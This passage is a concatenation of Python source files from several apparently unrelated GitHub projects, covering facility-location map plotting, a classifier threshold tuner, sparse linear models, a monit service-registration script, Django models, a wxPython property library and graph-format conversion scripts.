popup=folium.Popup(popup_text, max_width=1000),
icon=folium.Icon(color=color, icon="industry", prefix="fa"),
).add_to(m)
def add_supply_routes_to_map(m: folium.Map, data: Problem, solution: Result) -> None:
for facility in data.facility_candidates:
for demand_center in data.demand_centers:
supply = solution.schedule.loc[facility.name, demand_center.name]["supply"]
if (supply > 0).any():
folium.PolyLine(
locations=[
facility.location.to_tuple(),
demand_center.location.to_tuple()
],
popup=folium.Popup(f"Average supply: {round(supply.mean())}", max_width=1000),
opacity=0.75
).add_to(m)
def plot_problem(data: Problem) -> folium.Map:
m = make_map(data=data)
add_demand_centres_to_map(m=m, data=data)
add_facilities_to_map(m=m, data=data)
return m
def plot_solution(data: Problem, solution: Result, show_unused_facilities: bool = True) -> folium.Map:
m = make_map(data=data)
add_demand_centres_to_map(m=m, data=data, solution=solution)
add_facilities_to_map(m=m, data=data, solution=solution, show_unused_facilities=show_unused_facilities)
add_supply_routes_to_map(m=m, data=data, solution=solution)
return m
def plot_costs(solution: Result):
solution.schedule.plot.bar()
``` |
{
"source": "jivanhoe/haystack",
"score": 3
} |
#### File: src/haystack/threshold_tuner.py
```python
import numpy as np
from haystack.optimal_sampling_classifier import OptimalSamplingClassifier
class ThresholdTuner(OptimalSamplingClassifier):
def fit(self, X: np.ndarray, y: np.ndarray) -> None:
self.base_estimator.fit(X=X, y=y)
self._threshold = None
super().fit(X=X, y=y)
def _fit_parameters(self, X: np.ndarray, y: np.ndarray) -> None:
predicted_proba = np.unique(self.predict_proba(X=X)[:, 1])
loss = []
for threshold in predicted_proba:
self._threshold = threshold
loss.append(self._compute_loss(X=X, y=y).mean())
        self._threshold = predicted_proba[np.argmin(loss)]
def predict(self, X: np.ndarray) -> np.ndarray:
return np.where(self.predict_proba(X=X)[:, 1] > self.threshold, self.minority_class, self.majority_class)
def _compute_loss(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
return (
            (self.predict(X=X) != y)
            * np.where(y == self.minority_class, self.false_negative_cost, self.false_positive_cost)
)
@property
def threshold(self) -> float:
return self._threshold
``` |
{
"source": "jivanhoe/sparsely",
"score": 3
} |
#### File: src/sparsely/sparse_linear_classifier.py
```python
from typing import Optional
import numpy as np
from sklearn.base import ClassifierMixin
from sklearn.linear_model import LogisticRegression
from sparsely.base import BaseSparseLinearModel
class SparseLinearClassifier(BaseSparseLinearModel, ClassifierMixin):
def __init__(
self,
max_selected_features: int,
l2_penalty: float = 0.1,
rescale: bool = True,
max_iter: int = 100,
convergence_tol: float = 1e-5,
max_seconds_per_cut: Optional[int] = None,
random_state: Optional[int] = None,
verbose: bool = False
):
super().__init__(
max_selected_features=max_selected_features,
l2_penalty=l2_penalty,
rescale=rescale,
max_iter=max_iter,
convergence_tol=convergence_tol,
max_seconds_per_cut=max_seconds_per_cut,
random_state=random_state,
verbose=verbose
)
def _initialize_support(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
return np.isin(
np.arange(self.n_features_in_),
np.argsort(
-np.abs(
LogisticRegression(
C=2 * self.max_selected_features / len(X) / self.l2_penalty
).fit(X=X, y=y).coef_
)
)[:self.max_selected_features]
)
def _compute_weights_for_subset(self, X_subset: np.ndarray, y: np.ndarray) -> np.ndarray:
return LogisticRegression(
C=2 * self.max_selected_features / X_subset.shape[0] / self.l2_penalty
).fit(X=X_subset, y=y).coef_.flatten()
def _compute_dual_variables(self, X_subset: np.ndarray, y: np.ndarray, weights_subset: np.ndarray) -> np.ndarray:
return -y / (1 + np.exp(y * np.matmul(X_subset, weights_subset)))
def _compute_objective_value(self, X_subset: np.ndarray, y: np.ndarray, dual_variables: np.ndarray) -> float:
return (
(
y * dual_variables * np.log(-y * dual_variables)
- (1 + y * dual_variables) * np.log(1 + y * dual_variables)
).sum()
- self.max_selected_features / np.sqrt(X_subset.shape[0]) / self.l2_penalty
* (np.matmul(X_subset.T, dual_variables) ** 2).sum()
)
```
#### File: src/sparsely/sparse_linear_regressor.py
```python
from typing import Optional
import numpy as np
from sklearn.base import RegressorMixin
from sklearn.linear_model import Ridge
from sparsely.base import BaseSparseLinearModel
class SparseLinearRegressor(BaseSparseLinearModel, RegressorMixin):
def __init__(
self,
max_selected_features: int,
l2_penalty: float = 0.1,
rescale: bool = True,
max_iter: int = 100,
convergence_tol: float = 1e-5,
max_seconds_per_cut: Optional[int] = None,
random_state: Optional[int] = None,
verbose: bool = False
):
super().__init__(
max_selected_features=max_selected_features,
l2_penalty=l2_penalty,
rescale=rescale,
max_iter=max_iter,
convergence_tol=convergence_tol,
max_seconds_per_cut=max_seconds_per_cut,
random_state=random_state,
verbose=verbose
)
def _initialize_support(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
return np.isin(
np.arange(self.n_features_in_),
np.argsort(
-np.abs(Ridge(alpha=self.l2_penalty * len(X) / self.max_selected_features).fit(X=X, y=y).coef_)
)[:self.max_selected_features]
)
def _compute_weights_for_subset(self, X_subset: np.ndarray, y: np.ndarray) -> np.ndarray:
return np.matmul(
np.linalg.inv(
2 * self.l2_penalty * X_subset.shape[0] / self.max_selected_features * np.eye(X_subset.shape[1])
+ np.matmul(X_subset.T, X_subset)
),
np.matmul(X_subset.T, y)
)
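    # Note: the expression above is the closed-form ridge solution restricted to
    # the selected feature subset, w = (2 * t * I + X^T X)^-1 X^T y with
    # t = l2_penalty * n_samples / max_selected_features.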
def _compute_dual_variables(self, X_subset: np.ndarray, y: np.ndarray, weights_subset: np.ndarray) -> np.ndarray:
return y - np.matmul(X_subset, weights_subset)
def _compute_objective_value(self, X_subset: np.ndarray, y: np.ndarray, dual_variables: np.ndarray) -> float:
return 0.5 * np.dot(y, dual_variables)
``` |
{
"source": "jivank/qmonit",
"score": 2
} |
#### File: jivank/qmonit/qmonit.py
```python
import os
import sys
import re
import subprocess
import shutil
QMONIT_DIR = '/opt/qmonit'
try:
if not os.path.exists(QMONIT_DIR):
os.makedirs(QMONIT_DIR)
except OSError as os_error:
sys.exit("Please use a privileged account")
def make_executable(path):
mode = os.stat(path).st_mode
mode |= (mode & 0o444) >> 2 # copy R bits to X
os.chmod(path, mode)
def find_monit_dir():
reg = re.compile(r'include (\/.+)\*')
with open('/etc/monit/monitrc') as monitrc:
for line in monitrc:
results = reg.findall(line)
if results:
return results[0]
sys.exit("Unable to find monit config folder")
def build_script(service_name, app_path, args, helper_script):
script = '''#!/bin/bash
{} {} &
echo $! > /opt/qmonit/{}/{}.pid'''.format(app_path, args, service_name, service_name)
with open(helper_script, 'w') as f:
f.write(script)
make_executable(helper_script)
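# For a hypothetical service "myapp" launched as "/usr/bin/myapp --port 8080",
# the generated helper script would read:
#   #!/bin/bash
#   /usr/bin/myapp --port 8080 &
#   echo $! > /opt/qmonit/myapp/myapp.pid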
def build_monit(monit_path, service_name, helper_script, pidfile):
monit = '''check process {} with pidfile {}
start program = "{}" as uid {} and gid {}
stop program = "/bin/kill `{}`" as uid {} and gid {} '''.format(
service_name,
pidfile,
helper_script,
service_name,
service_name,
pidfile,
service_name,
service_name)
monitfile = os.path.join(monit_path, service_name)
with open(monitfile, 'w') as f:
f.write(monit)
def create_user(service_name):
subprocess.check_output("useradd -r --shell /bin/false {}".format(service_name).split())
def chown_folder(service_name, qmonit_service_dir):
command = "chown -R {}:{} {}".format(service_name, service_name, qmonit_service_dir).split()
subprocess.check_output(command)
def determine_app_path(executable):
if os.path.isfile(executable):
return os.path.abspath(executable)
return shutil.which(executable) or exit('')
if __name__ == '__main__':
ARGUMENTS = dict(zip(['file', 'service', 'exe', 'args'], sys.argv))
if not ARGUMENTS.get('exe') or not ARGUMENTS.get('service'):
sys.exit('usage: qmonit.py <service name> <executable> "arg1 arg2 arg3"')
MONIT_PATH = find_monit_dir()
SERVICE_NAME = ARGUMENTS.get('service')
SERVICE_QM_DIR = os.path.join('/opt/qmonit', SERVICE_NAME)
FULL_APP_PATH = determine_app_path(ARGUMENTS['exe'])
ARGS = ARGUMENTS.get('args') or ''
HELPER_SCRIPT = os.path.join(QMONIT_DIR, SERVICE_NAME, SERVICE_NAME + '.sh')
PID_FILE = os.path.join('/opt/qmonit/', SERVICE_NAME, SERVICE_NAME+'.pid')
os.makedirs(SERVICE_QM_DIR)
build_script(SERVICE_NAME, FULL_APP_PATH, ARGS, HELPER_SCRIPT)
build_monit(MONIT_PATH, SERVICE_NAME, HELPER_SCRIPT, PID_FILE)
create_user(SERVICE_NAME)
chown_folder(SERVICE_NAME, SERVICE_QM_DIR)
print('Done')
``` |
{
"source": "jivanyan/salesior",
"score": 2
} |
#### File: jivanyan/salesior/populate.py
```python
import os
#settings.configure()
def populate_patrons():
add_user("x", "test")
def add_user(name, pwd):
u = User.objects.get_or_create(username = name, password = <PASSWORD>)
return u
def add_five_more_patrons():
    # p = Patron.objects.filter
    pass
if __name__ == '__main__':
print "Starting commerce population script..."
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'website.settings')
from django.contrib.auth.models import User
    from website.apps.patron.models import *
    from website.apps.venue.models import *
populate_patrons()
#populate_venues()
print "FINISH"
```
#### File: bonus/algorithms/base.py
```python
import re
class BonusAlgorithmBase(object):
"""
Interface for all Bonus Plans.
"""
def referral_bonus(self, referer, refered, venue):
"""
Returns a tuple with a Bonus for referrer, and a Bonus
for referred in that order.
"""
raise NotImplementedError()
@property
def enum_value_name(self):
name = self.__class__.__name__
# add an underline in before un uppercase caracter if it's not after
# another uppercase caracter.
# e.g.
# >> re.sub('(?<!^)(?=[A-Z])(?<![A-Z])', '_', 'AbcdEFGhIJ')
# == Abcd_EFGh_IJ
return re.sub('(?<!^)(?=[A-Z])(?<![A-Z])', '_', name).upper()
```
#### File: apps/message/models.py
```python
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class MessageManager(models.Manager):
def inbox_for(self, user):
return self.filter(recipient = user, deleted_by_recipient_at__isnull = True,)
def outbox_for(self, user):
return self.filter(sender = user, deleted_by_sender_at__isnull = True,)
def trash_for(self, user):
pass
class Message(models.Model):
subject = models.CharField(max_length = 120)
body = models.TextField()
sender = models.ForeignKey(User, related_name = 'sent_messages')
recipient = models.ForeignKey(User, related_name = 'received_messages')
sent_at = models.DateTimeField(null = True, blank = True)
read_at = models.DateTimeField(null = True, blank = True)
deleted_by_sender_at = models.DateTimeField(null=True, blank=True)
deleted_by_recipient_at = models.DateTimeField(null=True, blank=True)
objects = MessageManager()
def new(self):
if self.read_at is not None:
return False
return True
def __unicode__(self):
return self.subject
class Meta:
ordering = ['-sent_at']
def inbox_count_for(user):
"""
returns the number of unread messages for the given user but does not
mark them seen
"""
return Message.objects.filter(recipient=user, read_at__isnull=True, deleted_by_recipient_at__isnull=True).count()
``` |
{
"source": "Jive-Faury/TouchDesigner_Tools",
"score": 3
} |
#### File: TouchDesigner_Tools/TD_Dev/mixerEXT.py
```python
class mixerEXT:
"""
mixer description
"""
def __init__(self, ownerComp):
# The component to which this extension is attached
self.ownerComp = ownerComp
self.metaItems = ['length', 'sample_rate']
self.currentSlot = 'slotA'
def addItem(self):
"""
add playlist item in the playlist DAT
"""
for row in iop.MediaDat.rows('*')[1:]:
items = self.getMeta(row)
debug(items)
iop.playlist.appendRow(row + items)
    def getMeta(self, mediaRow):
        """
        return a meta list of media data for the specified media row
"""
iop.MetaTop.par.file = mediaRow[1]
iop.MetaTop.par.reload.pulse()
items = []
for item in self.metaItems:
items.append(iop.MetaChop[item].eval())
return items
def clearPlayList(self):
"""
clear playlistDat table
"""
iop.playlistDat.clear()
def onSelectRow(self,info):
"""
handles the onSelectRow callback for the lister
"""
nextSlot = 'slotB' if self.currentSlot == 'slotA' else 'slotA'
player = getattr(iop, self.currentSlot)
mediaPath = info['rowData']['rowObject'][1]
player.par.file = mediaPath
player.par.reload.pulse()
self.cross()
self.currentSlot = nextSlot
def onClick(self, info):
        if info['colName'] == 'Delete':
            debug(info)
def cross(self):
self.ownerComp.Mixab = True if self.currentSlot == 'slotB' else False
``` |
{
"source": "JiveHelix/pex",
"score": 3
} |
#### File: python/pex/compound_creator.py
```python
from __future__ import annotations
from typing import Generic, TypeVar
T = TypeVar('T')
class CompoundCreator(Generic[T]):
@classmethod
def Create(
class_,
name: str,
value: T) -> CompoundCreator[T]:
        raise NotImplementedError("Create must be overridden")
```
#### File: python/pex/range.py
```python
from __future__ import annotations
from typing import Generic, TypeVar, Callable, Optional, cast, Type
import attr
from .value import (
ModelValue,
InterfaceValue,
FilteredReadOnlyValue,
FilteredInterfaceValue,
ValueContext)
from .types import ValueCallback
from .transform import TransformModel, TransformInterface
from .initializers import InitializeInterface
from .compound_creator import CompoundCreator
ModelNumber = TypeVar('ModelNumber', int, float)
InterfaceNumber = TypeVar('InterfaceNumber', int, float)
@attr.s(auto_attribs=True)
class Range(Generic[ModelNumber]):
value: ModelNumber
minimum: ModelNumber
maximum: ModelNumber
@TransformModel(Range, ModelValue.Create, init=True)
class RangeModel(CompoundCreator[ModelNumber]):
@classmethod
def Create(
class_,
name: str,
value: ModelNumber) -> RangeModel[ModelNumber]:
"""
Uses the value as the default minimum and maximum.
Use SetMinimum and SetMaximum to make this instance useful.
"""
return RangeModel(Range(value, value, value), name)
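    # A minimal usage sketch (hypothetical name and values, assuming the
    # TransformModel decorator supplies the generated __init__):
    #   brightness = RangeModel.Create('brightness', 0)
    #   brightness.SetMinimum(-100)
    #   brightness.SetMaximum(100)
    #   brightness.Set(150)  # clamped to the maximum, i.e. 100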
def SetMinimum(self, minimum: ModelNumber) -> None:
minimum = min(minimum, self.maximum.Get())
# Delay publishing the new minimum until value has been adjusted.
with ValueContext(self.minimum) as context:
context.Set(minimum)
if self.value.Get() < minimum:
self.value.Set(minimum)
def SetMaximum(self, maximum: ModelNumber) -> None:
maximum = max(maximum, self.minimum.Get())
# Delay publishing the new maximum until value has been adjusted.
with ValueContext(self.maximum) as context:
context.Set(maximum)
if self.value.Get() > maximum:
self.value.Set(maximum)
def Set(self, value: ModelNumber) -> None:
value = max(
self.minimum.Get(),
min(value, self.maximum.Get()))
self.value.Set(value)
def SetWithoutNotify_(self, value: ModelNumber) -> None:
value = max(
self.minimum.Get(),
min(value, self.maximum.Get()))
self.value.SetWithoutNotify_(value)
def Notify_(self) -> None:
self.value.Notify_()
def Connect(self, callback: ValueCallback[ModelNumber]) -> None:
self.value.Connect(callback)
def Disconnect(self, callback: ValueCallback) -> None:
self.value.Disconnect(callback)
def Get(self) -> ModelNumber:
return self.value.Get()
@TransformInterface(RangeModel, InterfaceValue.Create, init=False)
@attr.s(auto_attribs=True, init=False)
class RangeInterface(Generic[ModelNumber, InterfaceNumber]):
value: FilteredInterfaceValue[ModelNumber, InterfaceNumber]
minimum: FilteredReadOnlyValue[ModelNumber, InterfaceNumber]
maximum: FilteredReadOnlyValue[ModelNumber, InterfaceNumber]
def __init__(
self,
rangeModel: Optional[RangeModel[ModelNumber]],
name: Optional[str] = None) -> None:
if rangeModel is not None:
InitializeInterface(
self,
cast(RangeModel[ModelNumber], rangeModel),
name)
@classmethod
def Create(
class_: Type[RangeInterface[ModelNumber, InterfaceNumber]],
model: RangeModel[ModelNumber],
namePrefix: Optional[str] = None) \
-> RangeInterface[ModelNumber, InterfaceNumber]:
return class_(model, namePrefix)
def AttachFilterOnGet(
self,
filterOnGet: Callable[[ModelNumber], InterfaceNumber]) -> None:
self.value.AttachFilterOnGet(filterOnGet)
self.minimum.AttachFilterOnGet(filterOnGet)
self.maximum.AttachFilterOnGet(filterOnGet)
def AttachFilterOnSet(
self,
filterOnSet: Callable[[InterfaceNumber], ModelNumber]) -> None:
self.value.AttachFilterOnSet(filterOnSet)
class RangeFactory(Generic[ModelNumber]):
value_: ModelNumber
minimum_: ModelNumber
maximum_: ModelNumber
def __init__(
self,
value: ModelNumber,
minimum: ModelNumber,
maximum: ModelNumber) -> None:
self.value_ = value
self.minimum_ = minimum
self.maximum_ = maximum
def __call__(self) -> Range[ModelNumber]:
return Range(self.value_, self.minimum_, self.maximum_)
```
#### File: python/pex/reference.py
```python
from __future__ import annotations
from typing import Callable, Any, Optional
from inspect import ismethod
from weakref import WeakMethod, ref
from .types import CallbackType, Reference
def MakeReference(
callback: CallbackType,
onFinalize: Optional[Callable[[Reference[CallbackType]], Any]]) \
-> Reference[CallbackType]:
if ismethod(callback):
return WeakMethod(callback, onFinalize)
else:
return ref(callback, onFinalize)
def GetReference(callback: CallbackType) -> Reference[CallbackType]:
return MakeReference(callback, None)
```
#### File: python/pex/transform_common.py
```python
from __future__ import annotations
from typing import (
TypeVar,
Callable,
Type,
Any,
Optional,
List,
Set,
ClassVar,
Dict,
Generic,
Union,
DefaultDict)
import types
import inspect
from collections import defaultdict
import attr
T = TypeVar("T")
Prototype = TypeVar("Prototype")
Attribute = TypeVar("Attribute")
# A global record of transformed prototypes
classByPrototypeNameBySeries: DefaultDict[str, Dict[str, Type[Any]]] = \
defaultdict(dict)
def GetHasName(attributeMaker: Callable[..., Attribute]) -> bool:
""" @return True if 'name' is the first parameter """
if isinstance(attributeMaker, type):
# this is a class
try: # type: ignore
init = getattr(attributeMaker, '__init__')
except AttributeError:
return False
signature = inspect.signature(init)
else:
signature = inspect.signature(attributeMaker)
return next(iter(signature.parameters.keys())) == 'name'
def GetClassName(class_: Type[Any]) -> str:
return "{}.{}".format(class_.__module__, class_.__name__)
def GetMemberType(
prototype: Union[Any, Type[Any]],
memberName: str) -> Type[Any]:
return type(getattr(prototype, memberName))
def GetMemberTypeName(
prototype: Union[Any, Type[Any]],
memberName: str) -> str:
return GetClassName(GetMemberType(prototype, memberName))
def GetDecoratedClass(class_: Type[Any], series: str = 'model') -> Type[Any]:
typeName = GetClassName(class_)
classByPrototypeName = classByPrototypeNameBySeries[series]
return classByPrototypeName[typeName]
def IsPrototype(class_: Type[Any], series: str = 'model') -> bool:
if series not in classByPrototypeNameBySeries:
return False
typeName = GetClassName(class_)
return typeName in classByPrototypeNameBySeries[series]
def GetTransformedInstanceVars(class_: Type[Any]) -> List[str]:
return class_.__transform_vars__
def IsTransformed(class_: Type[Any]) -> bool:
return hasattr(class_, "__transform_vars__")
def GetClassVars(class_: Type[Any]) -> List[str]:
return class_.__transform_class_vars__
```
#### File: python/pex/type_inspection.py
```python
from __future__ import annotations
from functools import lru_cache
import sys
from typing import (
Any,
Type,
TypeVar,
Dict,
ForwardRef,
Union,
cast,
Hashable)
import typing
from .signal import Signal
from .value import ModelValue, FilteredModelValue
T = TypeVar('T')
@lru_cache(32)
def GetClassNamespace_(class_: Hashable) -> Dict[str, Any]:
return vars(sys.modules[class_.__module__])
@lru_cache(32)
def GetUnsubscriptedTypeImpl(
type_: Hashable,
parentClass: Hashable) -> Type[Any]:
if isinstance(type_, type):
return cast(Type[Any], type_)
if not isinstance(type_, str):
# It's not a type and it's not a str.
# We don't know what to do with it.
raise ValueError("Bad type argument: {}".format(type_))
forwardRef = ForwardRef(type_, is_argument=False)
# pylint: disable=protected-access
evaluated = forwardRef._evaluate(GetClassNamespace_(parentClass), None)
if evaluated is None:
raise RuntimeError("Unable to resolve type {}".format(type_))
if isinstance(evaluated, typing._GenericAlias): # type: ignore
return evaluated.__origin__
else:
return evaluated
@lru_cache(32)
def GetFirstTypeArgImpl_(type_: Hashable, parentClass: Type[Any]) -> Type[Any]:
""" Returns the actual type, even if type_ is a string. """
if isinstance(type_, type):
return type_
if not isinstance(type_, str):
# It's not a type and it's not a str.
# We don't know what to do with it.
raise ValueError("Bad type argument: {}".format(type_))
forwardRef = ForwardRef(type_, is_argument=False)
# pylint: disable=protected-access
evaluated = forwardRef._evaluate(GetClassNamespace_(parentClass), None)
if evaluated is None:
raise RuntimeError("Unable to resolve type {}".format(type_))
if isinstance(evaluated, typing._GenericAlias): # type: ignore
if isinstance(
evaluated.__args__[0], typing._GenericAlias): # type: ignore
# Now use the origin to retrieve the default value type.
return evaluated.__args__[0].__origin__
return evaluated.__args__[0]
return evaluated
def GetUnsubscriptedType(type_: Type[Any], parentClass: Type[Any]) -> Type[Any]:
"""
Return the unsubscripted type, or if the type_ argument is not
a GenericAlias, returns the type_.
    GetUnsubscriptedType(List[int]) -> List
    GetUnsubscriptedType(ModelValue[str]) -> ModelValue
    GetUnsubscriptedType(float) -> float
"""
# I cannot see how mypy/typeshed/python can allow me to declare that I am
# passing a union of hashable types.
# Explicitly cast them here.
return GetUnsubscriptedTypeImpl(
cast(Hashable, type_),
cast(Hashable, parentClass))
def GetFirstTypeArg(
type_: Union[Type[T], str],
parentClass: Type[Any]) -> Type[T]:
return GetFirstTypeArgImpl_(
cast(Hashable, type_),
cast(Hashable, parentClass))
```
#### File: pex/wx/add_label.py
```python
from typing import Any
import wx
def AddLabel(
parent: wx.Window,
label:str,
widget: Any,
style: Any) -> wx.Sizer:
label = wx.StaticText(parent, label=label)
sizer = wx.BoxSizer(style)
if style == wx.HORIZONTAL:
flag = wx.RIGHT
else:
flag = wx.BOTTOM | wx.EXPAND
sizer.AddMany((
(label, 0, flag, 5),
(widget, 1, flag)))
return sizer
```
#### File: pex/wx/shortcut.py
```python
from typing import (
Any,
Callable,
Iterable,
Union,
Tuple,
List,
Dict)
import itertools
import wx
import attr
from typing_extensions import Protocol
from .. import pex
keyStringByWxDefine = {
wx.WXK_DELETE: 'DELETE',
wx.WXK_BACK: 'BACK',
wx.WXK_INSERT: 'INSERT',
wx.WXK_RETURN: 'RETURN',
wx.WXK_PAGEUP: 'PGUP',
wx.WXK_PAGEDOWN: 'PGDN',
wx.WXK_LEFT: 'LEFT',
wx.WXK_RIGHT: 'RIGHT',
wx.WXK_UP: 'UP',
wx.WXK_DOWN: 'DOWN',
wx.WXK_HOME: 'HOME',
wx.WXK_END: 'END',
wx.WXK_SPACE: 'SPACE',
wx.WXK_TAB: 'TAB',
wx.WXK_ESCAPE: 'ESCAPE'}
modifierStringByWxAccel = {
wx.ACCEL_NORMAL: '',
wx.ACCEL_SHIFT: 'SHIFT',
wx.ACCEL_CMD: 'CTRL',
wx.ACCEL_ALT: 'ALT'}
modifierOrder = (wx.ACCEL_CMD, wx.ACCEL_SHIFT, wx.ACCEL_ALT)
class Key:
asciiCode_: int
def __init__(self, character: Union[int, str]) -> None:
if isinstance(character, int):
self.asciiCode_ = character
else:
self.asciiCode_ = ord(character)
def __repr__(self) -> str:
return keyStringByWxDefine.get(
self.asciiCode_,
chr(self.asciiCode_))
def __int__(self) -> int:
return self.asciiCode_
def GetModifierString(modifierBitfield: int) -> str:
"""
Returns a string describing all modifiers in the bitfield.
modifierBitfield may be bitwise combination of modifiers. Check the
modifierBitfield against each accel define to build the description string.
"""
return '+'.join([
modifierStringByWxAccel[modifier]
for modifier in modifierOrder
if modifierBitfield & modifier])
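# For example, GetModifierString(wx.ACCEL_CMD | wx.ACCEL_SHIFT) yields
# 'CTRL+SHIFT', following the CMD, SHIFT, ALT ordering defined above.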
@attr.s(auto_attribs=True, eq=False, slots=True)
class Shortcut:
signal: pex.InterfaceSignal
modifier: int
ascii: str
description: str
longDescription: str
@property
def name(self) -> str:
return self.signal.name
class ShortcutMethods:
signal_: pex.InterfaceSignal
id_: int
modifier_: int
key_: Key
description_: str
longDescription_: str
def __init__(self, shortcut: Shortcut) -> None:
self.signal_ = shortcut.signal
self.id_ = wx.Window.NewControlId()
self.modifier_ = shortcut.modifier
self.key_ = Key(shortcut.ascii)
self.description_ = shortcut.description
self.longDescription_ = shortcut.longDescription
def AddToMenu(self, menu: wx.Menu) -> None:
menu.Append(
wx.MenuItem(
menu,
self.id_,
self.GetMenuItemLabel(),
self.longDescription_))
def GetMenuItemLabel(self) -> str:
modifier = GetModifierString(self.modifier_)
if len(modifier) > 0:
return u'{}\t{}+{}'.format(self.description_, modifier, self.key_)
else:
return u'{}\t{}'.format(self.description_, self.key_)
def GetAcceleratorTableEntry(self) -> Tuple[int, int, int]:
return (self.modifier_, int(self.key_), self.id_)
def OnEventMenu(self, ignored: wx.CommandEvent) -> None:
self.signal_.Trigger()
def GetId(self) -> int:
return self.id_
class HasWxShortcutMethods(Protocol):
acceleratorShortcutMethods_: List[ShortcutMethods]
menuShortcutMethodsByName_: Dict[str, ShortcutMethods]
acceleratorTable_: wx.AcceleratorTable
def SetAcceleratorTable(
self,
acceleratorTable_: wx.AcceleratorTable) -> None:
...
def Bind(
self,
binder: Any,
callback: Callable[[wx.CommandEvent], None],
id: int = wx.ID_ANY) -> None: # pylint: disable=redefined-builtin
...
class ShortcutMixin:
def __init__(
self: HasWxShortcutMethods,
acceleratorShortcuts: Iterable[Shortcut],
menuShortcuts: Iterable[Shortcut]):
self.acceleratorShortcutMethods_ = [
ShortcutMethods(shortcut) for shortcut in acceleratorShortcuts]
self.menuShortcutMethodsByName_ = {
shortcut.name: ShortcutMethods(shortcut)
for shortcut in menuShortcuts}
self.acceleratorTable_ = wx.AcceleratorTable([
shortcutMethods.GetAcceleratorTableEntry()
for shortcutMethods in self.acceleratorShortcutMethods_])
self.SetAcceleratorTable(self.acceleratorTable_)
for shortcut in itertools.chain(
self.acceleratorShortcutMethods_,
self.menuShortcutMethodsByName_.values()):
self.Bind(
wx.EVT_MENU,
shortcut.OnEventMenu,
id=shortcut.GetId())
def AddShortcutToMenu(self, shortcutName: str, menu: wx.Menu) -> None:
self.menuShortcutMethodsByName_[shortcutName].AddToMenu(menu)
```
#### File: wx/utility/number_validator.py
```python
from __future__ import annotations
import string
import wx
class NumberValidator(wx.Validator):
def __init__(self) -> None:
super(NumberValidator, self).__init__()
self.Bind(wx.EVT_CHAR, self.OnChar_)
def Clone(self) -> NumberValidator:
return NumberValidator()
def Validate(self, ignored: wx.Window) -> bool:
value = self.GetWindow().GetValue()
try:
float(value)
except ValueError:
return False
return True
def OnChar_(self, wxEvent: wx.CommandEvent) -> None:
keyCode = wxEvent.GetKeyCode()
if keyCode < wx.WXK_SPACE or keyCode == wx.WXK_DELETE or keyCode > 255:
wxEvent.Skip()
return
if chr(keyCode) in string.digits or chr(keyCode) in ('.', '-'):
# Allow this character to propagate
wxEvent.Skip()
return
if not wx.Validator.IsSilent():
wx.Bell()
```
#### File: pex/wx/window.py
```python
from typing import List
import abc
import wx
from .. import pex
class Window:
""" A mixin that disconnects pex when the window is destroyed. """
tubes_: List[pex.HasDisconnectAll]
wxId_: int
def __init__(self: wx.Window, tubes: List[pex.HasDisconnectAll]) -> None:
self.tubes_ = tubes
self.wxId_ = self.GetId()
self.Bind(
wx.EVT_WINDOW_DESTROY,
self.OnWindowDestroy_,
id=self.wxId_)
def OnWindowDestroy_(self, wxEvent: wx.CommandEvent) -> None:
if wxEvent.GetId() != self.wxId_:
print("WARNING: Received EVT_WINDOW_DESTROY for another window!")
return
wxEvent.Skip()
for tube in self.tubes_:
tube.DisconnectAll()
```
#### File: pex/wx/wx_chooser_adapter.py
```python
from __future__ import annotations
from typing import Generic, Any, List, Callable
from ..proxy import FilterProxy
from ..reference import Reference
from ..types import ValueType
def DefaultToString(value: ValueType) -> str:
return str(value)
class WxChooserAdapter(Generic[ValueType]):
toString_: FilterProxy[ValueType, str]
def __init__(
self,
toString: Callable[[ValueType], str] = DefaultToString) -> None:
self.toString_ = FilterProxy.Create(
toString,
self.RestoreDefaultToString_)
def ToString(self, value: ValueType) -> str:
return self.toString_(value)
def GetSelectionAsString(self, index: int, choices: List[ValueType]) -> str:
return self.toString_(choices[index])
def GetChoicesAsStrings(self, choices: List[ValueType]) -> List[str]:
return [self.toString_(choice) for choice in choices]
def RestoreDefaultToString_(
self,
ignored: Reference[Callable[[ValueType], str]]) -> None:
self.toString_ = FilterProxy.Create(DefaultToString, None)
``` |
{
"source": "jiverson002/bdmpi",
"score": 3
} |
#### File: graphdiameter/scripts/pair2adjacency.py
```python
import sys
from optparse import OptionParser
# Adjacencies dictionary
# ----------------------
# The key is the node ID, the value is
# a pair: the first position is a list of the outgoing neighbours, the second is
# a list of the incoming neighbours
adjacencies = dict()
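# For example, after add_edge(1, 2, directed=True) the dictionary holds
# {1: ([2], []), 2: ([], [1])}: node 1 lists 2 as outgoing, node 2 lists 1
# as incoming.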
# Adding edges to the dictionary
# ------------------------------
#
# Adds an edge between `u` and `v`. If the parameter `directed` is set to `True`
# then the edge is directed.
def add_edge(u, v, directed = False):
# Add `v` to the outgoing nodes of `u`
if u in adjacencies:
adjacencies[u][0].append(v)
else:
adjacencies[u] = ([v],[])
# Add `u` to the incoming nodes of `v`
if v in adjacencies:
adjacencies[v][1].append(u)
else:
adjacencies[v] = ([],[u])
# If the graph si undirected
if not directed:
# Add `u` to the outgoing nodes of `v`
if v in adjacencies:
adjacencies[v][0].append(u)
else:
adjacencies[v] = ([u],[])
# Add `v` to the incoming nodes of `u`
if u in adjacencies:
adjacencies[u][1].append(v)
else:
            adjacencies[u] = ([],[v])
# Converting between representations
# ----------------------------------
#
# Reads each line coming from standard input and updates the `adjacency` dictionary
# using the `add_edge` function.
#
# Once the dictionary is populated, then its contents are printed to standard
# output in the format expected by `gdem`.
def convert(directed = False):
for line in sys.stdin.readlines():
edge = line.split()
if len(edge) != 2:
raise Exception("edge with a number of nodes different than 2 " + str(edge))
add_edge(int(edge[0]), int(edge[1]), directed)
for (node_id, (out_edges, in_edges)) in adjacencies.iteritems():
sys.stdout.write("%d |" % (node_id))
for v in out_edges:
sys.stdout.write(" %d" % (v))
sys.stdout.write(" |")
for v in in_edges:
sys.stdout.write(" %d" % (v))
sys.stdout.write("\n")
# Main function
# -------------
#
# The main entry point of the script: sets a command line option (`-d`)
# and invokes `convert`
def main():
parser = OptionParser()
parser.add_option("-d", "--directed",
action="store_true",
dest="directed", default=False,
help="Create a directed graph")
(options, args) = parser.parse_args()
sys.stderr.write("Directed graph? " + str(options.directed) + "\n")
convert(options.directed)
if __name__ == "__main__":
main()
```
#### File: graphdiameter/scripts/splitInput.py
```python
import argparse
import sys
import os
